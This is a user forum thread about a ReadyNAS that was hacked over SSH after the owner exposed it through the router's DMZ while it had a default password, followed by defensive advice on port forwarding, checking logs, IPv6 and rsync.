Can a 314 ReadyNAS get hacked?

Kindly mdgm has contacted me to tell me I AM hacked... Looks like they got in via SSH when I briefly dropped my firewall protection to the unit... Going to try a factory reset when time allows after backing up all items again.

Could mdgm or someone else post a bit more information on how a readynas was hacked? Even if one does not enable port forwarding via ones router, but has run toggleSSH plugin for its intended purpose, allowing netgear tech support to access a system - does this leave a readynas vulnerable? If tech support gain access without port fowarding, I would imagine some with less honorable intentions might be able to access a system as well (I'm not expert).

Also, even if one did everything wrong and enabled root SSH and did have port forwarding on a router, wouldn't a strong password be protective?

What sort of hacking is taking place? Is there a malware package designed to affect the readynas out there we should know about? How does one check the integrity of one's system?

The Toggle SSH add-on for legacy NAS units has a password specific to the system (unless Enable Root SSH has been installed previously). The hacker would need some knowledge of the system they are targeting to hack into it, so it is unlikely. The Toggle SSH add-on is not what was used here.

These days tech support accesses systems without requiring port forwarding. A secure connection is made back to a NETGEAR server which only NETGEAR support and ReadyNAS Product engineering can access.

Root SSH with a strong password would provide some protection but wouldn't guarantee a system wouldn't be hacked. Do remember that when an OS Re-install is done the password is reset to the default one which would leave you exposed if port forwarding is active till you change the password again.

Usually if a NAS gets hacked it is because SSH is forwarded and the default password is set. This is true for every NAS vendor which has SSH as a feature.

The NAS runs Debian with some customisations. There are different kinds of malware out there including some that can lead to data loss.

It is important that you backup your important data regularly and that you don't forward ports to your NAS that you don't need to.



To check the integrity of your system you'd look in e.g. processes.log for processes that shouldn't be there, systemd-journal.log for suspicious entries, the bash_history.log for suspicious entries and in other logs.

I must stress the error of my ways:

I had need to set my NAS to tech support mode. Thinking I was being helpful, I set my routers DMZ feature to point at the NAS, thereby dropping the firewall protecting the NAS. My thought process was I didn't want anything to obstruct the tech support staff from doing their job. I presume that at some point in the process of engaging the tech support mode, the box reverts its password back to the default - and there you go open access via SSH with the known default password. My only query and surprise, how did someone know which WAN IP address to target? My address is static but we have only had it 6 weeks total since our service provider changed a batch over apparently.

I admit I am a complete idiot - but only through a lack of understanding. If I'd know that access was fine without any port forwarding for sure, I probably wouldn't have ever dropped the firewall.

The main thing that made me realise there was something amiss was on the admin dashboard. The performance screen showed a lot of network activity (mainly Tx) onto the LAN from the ReadyNAS when no device was accessing it on the LAN. My router kept falling over and the LAN was unusable. Unplugging the NAS fixed the problem each time. My suspicions it was the NAS grew.

I must say a big big thank you to mdgm who has helped get to the bottom of the issue and has help by having someone inspect my logs. I'm not a complete newbie to these things but I am not an IT professional and I would have been a bit stuck without his invaluable help.

how did someone know which WAN IP address to target? My address is static but we have only had it 6 weeks total since our service provider changed a batch over apparently.

There are crawlers scanning through public IP's, trying to connect to port 22 and then various different passwords. Some of them specifically looking for ReadyNAS devices with the tech support password... It's why we very rarely and only as a last resort recommend device access through port forwarding.

That's frightening to think of really. For those doing remote backups (I was going to use my old NAS to do this from my office), does Rsync over SSH require port 22 opened up, putting users at risk? (or just port 873?)

Maybe a little off topic but relevant to hacking: I have been doing some reading on IPv6 (wondering what an earth that was!) and it strikes me that each piece of equipment in the world having its own WAN address is going to make it even easier for things like a crawler to cause mayhem. I wonder if it is worth disabling IPv6 - most home LANs are not likely to benefit.

IanWilson wrote:
...I wonder if it is worth disabling IPv6 - most home LANs are not likely to benefit.

Well, the security needs to be maintained in your edge router with both IPv4 and IPv6. It is easy enough for the router to deny unsolicited inbound connections for IPv6, the same as it does for IPv4. So I think your security concerns are overstated.

The simple answer is that if your ISP is giving you an IPv6 address you should have IPv6 enabled on your home network as well.

If your ISP is not giving you an IPv6 WAN address, then there is no reason to enable it in the router.

Thanks Stephen - that's helpful to know. I disabled it at present but will investigate with an online native ipv6 checker tool sometime. The router's firewall does not state anything about ipv4 or 6, so I presume any rules applied are applied to both.

I sure would like additional information about what sort of hacking is going on.

I don't have port forwarding enabled, and I use strong passwords.

But I did have to enable root ssh to trouble shoot share and file permissions problems I had when I began backing up a Ultra 6+ to a 316 using rsync; the problem turned out to be the differing UID's for standard accounts on the two systems (thanks again to those on the forum who helped me solve this!) but I needed shell access to track it down. I've run toggle-ssh to disable SSH, but one can't fully reverse the effects of the enable root SSH plugin without doing a factory default. Is this a security problem?

My nightmare scenario, if you will, is coming home and finding that a Linux-NAS version of Cryptowall has encrypted all my files, as well as the copies on my connected backups.

And, I'd hate for someone to start transferring copies of all my data to a server in Antarctica.

So---any available information on "known" malware that can affect a readynas would be appreciated.

If you try SSHing into your NAS now that you've disabled SSH what response do you get?

Well there has to be some way that a hacker was able to get at the NAS. You had it on DMZ.